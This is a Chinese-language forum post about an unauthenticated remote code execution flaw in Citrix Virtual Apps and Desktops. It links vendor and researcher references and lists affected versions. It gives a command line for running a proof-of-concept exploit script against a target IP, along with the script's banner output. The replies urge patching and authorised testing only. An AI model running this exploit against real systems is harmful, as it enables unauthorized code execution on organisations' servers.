Citrix虚拟应用程序和桌面(XEN)未经身份验证的RCE远程代码执行漏洞(Exp)
漏洞简述
Citrix Virtual Apps and Desktops (XEN) 未经身份验证的RCE远程代码执行漏洞(CVE未知),了解更多技术细节可看watchTowrLabs的文章。https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
影响版本
Citrix Virtual Apps and Desktops 7 2402 LTSR 及之前的任何版本都存在此漏洞,更多详细信息请参阅citrix公告。
https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
POC使用
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
__ ______________
_________ _/|__ ____ ||_\__ ____\_____________
\ \/ \/ \__\ ___/ ___\||\| | /_ \ \/ \/ \___ \
\ / / __ \|| \\___| Y| |(<_> \ / || \/
\/\_/ (____|__|\___|___|__|__| \__/ \/\_/|__|
\/ \/ \/
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr
- Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
CVEs:
Command sent to 192.168.1.120 successfully!
Re: Citrix虚拟应用程序和桌面(XEN)未经身份验证的RCE远程代码执行漏洞(Exp)
这个漏洞信息很及时,感谢分享。未经身份验证就能RCE,严重程度确实很高,尤其是影响范围覆盖了Citrix Virtual Apps and Desktops 7的多个版本。已有POC流出,建议相关运维人员尽快参考Citrix官方公告(CTX691941)排查受影响版本并部署补丁。同时,在修复前可以尝试通过防火墙限制对相关端口的访问,降低被利用风险。Re: Citrix虚拟应用程序和桌面(XEN)未经身份验证的RCE远程代码执行漏洞(Exp)
这个漏洞看起来很严重,未授权RCE加上影响范围这么广,确实需要尽快关注。感谢分享POC和参考链接,建议有相关环境的用户优先参考Citrix官方公告进行修复或临时缓解。同时提醒大家,在非授权环境下测试POC可能带来法律风险,务必只在获得授权的范围内进行验证。
页:
[1]